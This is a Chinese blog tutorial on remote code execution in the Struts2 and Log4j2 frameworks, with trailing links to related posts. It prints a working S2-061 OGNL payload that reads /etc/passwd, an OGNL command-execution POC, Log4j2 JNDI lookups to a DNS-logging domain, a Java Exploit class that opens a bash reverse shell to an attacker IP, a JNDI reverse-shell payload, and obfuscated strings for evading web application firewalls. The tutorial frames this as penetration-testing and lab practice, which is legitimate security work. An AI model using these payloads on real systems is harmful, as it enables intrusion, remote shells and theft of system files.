框架漏洞RCE-2

已于 2024-05-02 16:24:59 修改
阅读量775 收藏 12
点赞数 13
分类专栏: 渗透进阶 文章标签: 安全
于 2024-05-01 18:09:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x88125E/article/details/138375041
版权

一、Struts2

现阶段一般很少会用这个框架。

1、漏洞产生原因:struts2(除了S2-052以外),都是Struts2框架执行了恶意用户传进来的OGNL表达式(ongl表达式可以获取到运行变量的值,并且有机会执行函数调用),造成远程代码执行。

2、特征:URL地址以 “.action” “.do” 结尾或地址中包含“!”符号。能查看源码时,在应用的服务器上查看应用所在目录/WEB-INF/lib/下的jar文件,如果存在struts2-core-2.*.**.jar或xwork-core-2.*.**.jar格式的jar文件,检测是否存在Struts2漏洞。

3、工具:Liqun工具箱,struts2全版本漏洞检测工具

4、手工测试

(1)、bp抓包,更改请求方式,get--->POST

(2)、发送到重放模块

(3)、删除原有的content-type

(4)、将POC复制到最后,发送

#s2-061
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{
(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +
(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +
(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))
}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF—
常用POC
(%23_memberAccess['allowPrivateAccess']=true,%23_memberAccess['allowProtectedAccess']=true,%23_memberAccess['excludedPackageNamePatterns']=%23_memberAccess['acceptProperties'],%23_memberAccess['excludedClasses']=%23_memberAccess['acceptProperties'],%23_memberAccess['allowPackageProtectedAccess']=true,%23_memberAccess['allowStaticMethodAccess']=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream()))

(5)、查看返回包内容

5、靶场:vulnhub

二、log4j2漏洞

1、log4j2是利用jndi访问ldap协议,调取第三方服务

2、漏洞产生原因:由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。

3、验证漏洞存在

(1)、使用bp插件判断

(2)、bp抓包,将包发送到重放模块,在请求包中输入POC发送。

POC:?payload=${jndi:ldap://p5pok7.dnslog.cn/exp}

  • p5pok7.dnslog.cn为dnslog网站生成的临时域名
  • dnslog网站:DNSLog Platform
  • 如果发包后,返回错误,需要将POC进行URL编码

查看dns网站是否解析域名。如果有说明可能存在log4j2漏洞。

4、漏洞复现方法a

Kali B 192.168.200.107(反弹shell)

  • 编辑exploit.Java文件,修改其中的IP地址与端口
    • IP地址为:反弹shell到这的机器,端口为监听端口
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class Exploit {
static {
try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/192.168.200.107/1234 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}
  • 使用jdk1.8中的javac.exe编译exploit.java文件
    • 命令:javac.exe  exploit.java
    • 会在目录下生成exploit.class文件
  • 将生成的exploit.class文件与tools目录打包放到kali B中

  • 在目录下打开http服务,让开启ldap服务端的工具marshalsec-0.0.3-SNAPSHOT-all.jar来访问这个文件

  • 使用工具,开启ldap服务端,并访问Exploit.class文件

  • 打开监听端口

  • 在bp抓包后使用POC来连接ldap服务器端的访问过来的Exploit.class文件,通过参数传递到目标服务器进行解析

  • 返回监听查看情况,反弹shell成功

5、漏洞复现方法2

  • 在kali B上输入命令:

  • 打开监听

  • 在BP上输入POC:
    • ${jndi:ldap://192.168.200.107:1389/Basic/ReverseShell/192.168.200.107/1234}

  • 返回监听机子,查看情况。反弹成功

6、WAF绕过

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://xxx.dnslog.cn/poc}

${jndi:rmi://xxx.dnslog.cn/poc}

${${lower:jndi}:${lower:rmi}://xxx.dnslog.cn/poc}

${${lower:${lower:jndi}}:${lower:rmi}://xxx.dnslog.cn/poc}

${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://xxx.dnslog.cn/poc}

x88125E
关注
  • 13
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
向日葵RCE漏洞一键批量自己检测工具
02-25
【标题】:“向日葵RCE漏洞一键批量自我检测工具” 在网络安全领域,"RCE"是"Remote Code Execution"的缩写,意为远程代码执行。这是一个非常严重的安全漏洞,允许攻击者在目标系统上执行任意代码,从而获得与系统...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行(RCE漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
常见框架漏洞
2301_76786857的博客
01-17 2124
Web框架(Web framework)或者叫做Web应用框架(Web application framework),是用于进行Web开发的一套软件架构。大多数的Web框架提供了一套开发和部署网站的方式。为Web的行为提供了一套支持的方法。使用Web框架,很多的业务逻辑外的功能不需要自己再去完善,而是使用框架已有的功能就可以。如图片验证码 , 数据库交互语句等
JAVA框架漏洞
weixin_68408599的博客
06-14 1260
此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。漏洞原因:我们请求的URL在整个项目的传入传递过程。Apache Shiro框架提供了Remember Me功能,用户登录成功后会生成经过加密并编码的Cookie,即使关闭了浏览器,再次访问时无需进行登录操作即可以之前的身份访问网站。漏洞的出现就在URL1,URL2和URL3 有可能不是同一个URL,这就导致我们能绕过shiro的校验,直接访问后端需要首选的URL。
Spring框架漏洞
weixin_68408599的博客
12-11 1374
以下框架漏洞均为Spring的框架,讲解方式为漏洞产生原因以及漏洞复现,重点是漏洞复现的具体过程。
常见的框架漏洞
m0_46467017的博客
08-20 7903
Shiro默认使用了CookieRememberMeManager, 其处理cookie的流程是: 得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化.然而AES的密钥是硬编码的, 密钥泄漏的根本原因是开发人员在开发过程中部分代码直接使用了网上的一些开源的项目代码,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。cookie的key为RemeberMe,cookie的值是经过对相关信息进⾏序列化,然后使⽤aes加密,最后在使⽤base64编码处理形成的。
开发框架漏洞
weixin_56378389的博客
04-15 622
Struts2;Thinkphp
Struts2-045漏洞利用工具
08-11
Struts2-045漏洞,全称为"Apache Struts2 S2-045漏洞",是一个在2017年被公开的安全缺陷,主要影响使用Apache Struts2框架的Web应用程序。这个漏洞源于Struts2的一个核心组件,即OGNL(Object-Graph Navigation ...
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
Apache Struts2是一款非常流行的Java Web开发框架,它为开发者提供了构建MVC(Model-View-Controller)架构的便捷工具。然而,就像任何其他复杂的软件系统一样,Struts2也存在安全漏洞。其中,S2-045 和 CVE-2017-...
Spring框架漏洞合集
小小猪的博客
08-18 7884
Spring框架漏洞合集 Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977) 访问路径/oauth/authorize,会看到左上角有个绿色叶子的标志,一般都是spring或者springboot 直接打poc,可以看到有el表达式注入的形式 /oauth/authorize?response_type=${2*3}&client_id=acme&scope=openid&redirect_uri=http://test 如果要
渗透测试之框架漏洞
Blood_Pupil的博客
05-21 1886
PHP ThinkPHP Getshell SQli
“你的深度学习框架包含15个漏洞”,360说 | 附论文
量子位
12-03 866
允中 李林 编译整理 量子位 出品 | 公众号 QbitAI 注意!你的深度学习框架漏洞! 这个警告来自360安全实验室(Qixue Xiao、Deyue Zhang)、佐治亚大学(Kang Li)和弗吉尼亚大学(Weilin Xu)的研究者,他们在一篇论文中,对TensorFlow、Caffe、Torch三个深度学习框架中的第三方软件包进行了研究,并在其中查找漏洞,最后得出最
Spring框架漏洞总结
weixin_31351409的博客
02-21 2573
点击上方“小强的进阶之路”,选择“星标”公众号优质文章,及时送达预计阅读时间: 20分钟Spring简介Spring是Java EE编程领域的一个轻量级开源框架,该框架由一个叫Rod Jo...
Spring框架漏洞复现大杂烩!!!
热门推荐
SoulCat
02-27 2万+
Spring框架漏洞复现大杂烩!!! 寻了半生的春天 你一笑 便是了 总体概述: Spring是一个开源框架,核心是控制反转(IoC)和面向切面(AOP)。简单来说,Spring是一个分层的JavaSE/EE full-stack(一站式) 轻量级开源框架。简单说就是创建对象由以前的程序员自己new 构造方法来调用,变成交由Spring来创建对象 。类比Struts 2框架绝大部分的安全漏洞...
JAVA常用框架漏洞
小小猪的博客
08-13 3682
三大语言常用框架漏洞 Java框架 1.MyBatis 是支持定制化 SQL、存储过程以及高级映射的优秀的持久层框架,其主要就完成2件事情: 封装JDBC操作 利用反射打通Java类与SQL语句之间的相互转换 MyBatis的主要设计目的就是让我们对执行SQL语句时对输入输出的数据管理更加方便,所以方便地写出SQL和方便地获取SQL的执行结果才是MyBatis的核心竞争力。 ...
框架漏洞--小结
mingyqf的博客
04-05 1045
起因:之前被问到框架漏洞卡壳,正好看到先知社区的2019年文章有写就来记录一下 0x04 框架漏洞 寻找CMS,或者网页框架,以及某些厂商的服务存在漏洞 例如Apache中间件组件Shiro反序列化漏洞,这里简单说一下: 需要一个ysoserial.jar https://github.com/frohoff/ysoserial 以及默认秘钥 4AvVhmFLUs0KTA3Kprsdag== 2AvVhdsgUs0FSA3SDFAdag== 2AvVhdDFCVdfdfDFAdag== 3AvVhmFLU
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
最新发布
lupai的博客
07-24 440
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
thinkphp2-rce
07-28
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [ThinkPHP2-RCE漏洞复现]...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值